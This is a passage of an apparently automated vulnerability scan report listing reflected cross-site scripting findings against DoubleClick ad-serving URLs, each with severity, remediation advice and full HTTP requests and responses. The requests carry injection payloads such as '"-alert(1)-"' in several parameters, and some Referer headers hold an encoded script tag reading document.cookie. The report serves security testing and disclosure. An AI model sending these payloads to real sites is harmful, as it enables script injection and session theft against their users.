This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9719

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl
...[SNIP]...

4.12. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pubICode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1dd4"-alert(1)-"7f0ce352b24 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
icles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc
...[SNIP]...

4.13. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8de9"-alert(1)-"949f2676f9f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3
...[SNIP]...

4.14. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b6a"-alert(1)-"cafab609dca was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

4.15. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15c43"-alert(1)-"cd748a8fe0a was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4961
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 02 Feb 2011 20:27:49 GMT
Expires: Wed, 02 Feb 2011 20:27:49 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0ahttp://degrees.classesusa.com/schools/?sourceid=50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 300;
var winH =
...[SNIP]...

4.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138f5"-alert(1)-"eada4e3efbc was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
